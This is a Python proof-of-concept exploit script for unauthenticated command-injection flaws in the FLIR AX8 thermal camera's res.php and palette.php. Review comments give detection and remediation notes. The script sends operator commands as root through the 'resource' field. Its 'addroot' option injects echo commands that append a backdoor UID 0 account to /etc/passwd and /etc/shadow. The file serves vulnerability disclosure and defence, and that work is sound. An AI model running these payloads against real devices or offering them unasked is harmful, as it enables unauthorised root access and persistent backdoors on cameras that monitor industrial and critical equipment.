#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Remote Root Exploit
#
#
# Vendor: FLIR Systems, Inc.
# Product web page: https://www.flir.com
# Affected version: Firmware: 1.32.16
#                             1.17.13
#                   OS: neco_v1.8-0-g7ffe5b3
#                   Hardware: Flir Systems Neco Board
#
# Summary: Thermal Imaging Camera For Continuous Condition and Safety
# Monitoring FLIR AX8 is a thermal sensor with imaging capabilities.
# Combining thermal and visual cameras in a small, affordable package,
# the AX8 provides continuous temperature monitoring and alarming capabilities
# to protect critical electrical and mechanical equipment. The AX8 helps
# you guard against unplanned outages, service interruptions, and equipment
# failure.
#
# The FLIR AX series camera/sensor also has built-in support to connect to
# industrial control equipment such as programmable logic controllers (PLCs),
# and allows the sharing of analysis and alarm results and simple control
# using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy
# to install, the AX8 provides continuous monitoring of electrical cabinets,
# process and manufacturing areas, data centers, energy generation and distribution,
# transportation and mass transit, storage facilities and refrigeration warehouses.
#
# Desc: The FLIR AX8 thermal sensor camera suffers from two unauthenticated
# command injection vulnerabilities. The issues can be triggered when calling
# multiple unsanitized HTTP GET/POST parameters within the shell_exec function
# in res.php and palette.php file. This can be exploited to inject arbitrary
# system commands and gain root remote code execution.
#
# =============================================================================
# /FLIR/usr/www/res.php:
# ----------------------
# 1.
# NOTE(review): the excerpt of the vulnerable PHP that this heading introduces
# appears to be missing from this copy of the listing.
#
# =============================================================================
#
#
# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)
#            lighttpd/1.4.33
#            PHP/5.4.14
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2018-5491
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php
#
#
# 26.07.2018
#
# NOTE(review): line breaks and indentation below were reconstructed from a
# whitespace-collapsed copy of this listing; the two ASCII-art string literals
# are kept exactly as they appear in that copy (one line each). The script is
# Python 2 (print statements, raw_input).
#
# NOTE(review), defender view of what this proof of concept puts on the wire:
#   * POST /res.php with form fields action=get and resource=";<input>". No
#     credentials or session are sent. The leading ';' is what breaks out of
#     the command the PHP page builds for shell_exec (see Desc above).
#   * POST /palette.php with form field palette="1;<command>" (blind, the
#     response is never read).
#   * Fixed request headers, including the User-Agent value and a non-standard
#     'Connection-Type' header. Both are distinctive but trivially changed, so
#     treat them as low-fidelity signatures only.
# Web-server access logs normally record the request line and not the POST
# body, so spotting the shell metacharacter in 'resource' / 'palette' needs
# body inspection (IDS/WAF/proxy). The underlying fix belongs in res.php and
# palette.php: request parameters must not reach shell_exec unvalidated
# (allow-list the expected values, or at minimum escapeshellarg()). This page
# does not state a fixed firmware version; until a device is updated, keep its
# web interface off untrusted networks.
#

import requests
import colorama
import random##
import time####
import json####
import sys#####
import os######

# Script name, used only in the usage message.
piton = os.path.basename(sys.argv[0])

# Exactly one positional argument is expected; sys.argv[1] is used further down
# as the host part of the target URLs. NOTE(review): the argument placeholder
# appears to have been lost from the usage text in this copy.
if len(sys.argv) < 2:
    print '\n\x20\x20[*] Usage: '+piton+' \n'
    sys.exit()

# Cosmetic start-up banner (no effect on the requests sent).
bannah = """ .---------------------------------. | 1984 Pictures | | | | presents | | ___ | | [| |=|{)__ | | |___| \/ ) | | /|\ /| | | / | \ | \\ | .---------------------------------. """
print bannah
time.sleep(4)
# Clears the operator's local terminal; nothing is sent to the device here.
os.system('clear')
print '\nFLIR AX8 Thermal Camera Remote Root Exploit'
print 'By Zero Science Lab'

# Second cosmetic banner, printed with a random colorama foreground attribute
# in front of every character.
ICU = ''' ```````` `./+ooosoooooo+/.` `.+ss+//:::::::://+ss+.` -oyo/::::-------:::::/oyo- `/yo+:::-------.------:::+oy/` `+yo+::---...........----:/+oy+` `/yo++/--...../+oo+:....---:/+oy/` `ss++//:-.../yhhhhhhy/...-://++ss` .ho++/::--.-yhhddddhhy-.--:://+oh. .ho+//::---/mmmmmmmmmm:---::/++oh. `ss++//::---+mNNNNNNm+---:://++ss` `/yo+//:::----+syys+-----://++oy/` `+yo++//:::-----------:://++oy+` `/yo++///:::::-:::::://+++oy/` .oyo+++////////////+++oyo. `.+ssoo++++++++++ooss+.` `./+osssssssso+/.` ```````` '''

colors = list(vars(colorama.Fore).values())
colored_chars = [random.choice(colors) + char for char in ICU]

print(''.join(colored_chars))

print
# Operator hints. The /FLIR/usr/bin/freeze paths are on-device commands named
# by the author; their effect is not shown in this listing.
print '\x1b[1;37;44m'+'To freeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze on'
print '\x1b[1;37;41m'+'To unfreeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze off\n'

print '[*] Additional commands:'
print ' [+] \'addroot\' for add root user.'
print ' [+] \'exit\' for exit.\n'

# Interactive loop: every line typed at the prompt is sent to res.php before
# the script checks for its own keywords, so the literal strings 'exit' and
# 'addroot' also reach the device as injected input. Those two values in the
# 'resource' field are therefore session artifacts of this script.
while True:
    # Plain HTTP; the host comes straight from the command line.
    zeTargets = 'http://'+sys.argv[1]+'/res.php'
    # The prompt text is hard-coded decoration, not read from the device.
    zeCommand = raw_input('\x1b[0;96;49m'+'root@neco-0J0X17:~# '+'\x1b[0m')
    # Static header set, identical for every request this script makes.
    # 'Connection-Type' is not a standard HTTP header name.
    zeHeaders = {'Cache-Control'   : 'max-age=0',
                 'User-Agent'      : 'thricer/251.4ev4h',
                 'Accept'          : 'text/html,application/xhtml+xml',
                 'Accept-Encoding' : 'gzip, deflate',
                 'Accept-Language' : 'mk-MK,mk;q=1.7',
                 'Connection'      : 'close',
                 'Connection-Type' : 'application/x-www-form-urlencoded'}
    # Injection point 1: the 'resource' form field, prefixed with ';'.
    zePardata = {'action' : 'get', 'resource' : ';'+zeCommand}
    try:
        zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
        # The response body is parsed as JSON and printed; a body that is not
        # valid JSON raises and falls through to the generic handler below.
        print json.loads(zeRequest.text)
        if zeCommand.strip() == 'exit':
            sys.exit()
        if zeCommand.strip() == 'addroot':
            print '[+] Blind command injection using palette.php...'
            print '[+] Adding user \'roOt\' with password \'rewt\' in shadow file...'
            # Injection point 2: the 'palette' form field of palette.php.
            nuTargets = 'http://'+sys.argv[1]+'/palette.php'
            # Same dict object as zeHeaders (alias, not a copy).
            nuHeaders = zeHeaders
            # Hex-escaped text handed to 'echo -n -e' on the device. It decodes
            # to one shadow-format line for the account 'roOt' with an
            # MD5-crypt ('$1$') hash field, terminated by \n\r.
            nuHexstrn = ('\\x72\\x6f\\x4f\\x74\\x3a\\x24\\x31'
                         '\\x24\\x4d\\x4a\\x4f\\x6e\\x56\\x2f'
                         '\\x59\\x33\\x24\\x74\\x44\\x6e\\x4d'
                         '\\x49\\x42\\x4d\\x79\\x30\\x6c\\x45'
                         '\\x51\\x32\\x6b\\x44\\x70\\x66\\x67'
                         '\\x54\\x4a\\x50\\x30\\x3a\\x31\\x36'
                         '\\x39\\x31\\x34\\x3a\\x30\\x3a\\x39'
                         '\\x39\\x39\\x39\\x39\\x3a\\x37\\x3a'
                         '\\x3a\\x3a\\x0a\\x0d')
            # Forensic indicators on a device this was run against: a UID 0 /
            # GID 0 line for 'roOt' (GECOS 'pwn', home /sys, shell /bin/bash)
            # appended to /etc/passwd, and a matching line appended to
            # /etc/shadow. Both writes use '>>', so repeated runs leave
            # duplicate lines.
            nuPadata1 = {'palette' : '1;echo \"roOt:x:0:0:pwn:/sys:/bin/bash\" >> /etc/passwd'}
            nuPadata2 = {'palette' : '1;echo -n -e \"'+nuHexstrn+'\" >> /etc/shadow'}
            requests.post(nuTargets, headers=nuHeaders, data=nuPadata1)
            time.sleep(2)
            requests.post(nuTargets, headers=nuHeaders, data=nuPadata2)
            # Printed unconditionally: neither palette.php response is checked,
            # so this message is not evidence that the writes happened.
            print '[*] Success!\n'
        else: pass
    except Exception:
        # Any request or JSON-parsing failure ends the session. sys.exit()
        # above raises SystemExit, which this handler does not catch.
        print '[*] Error!'
        break

sys.exit()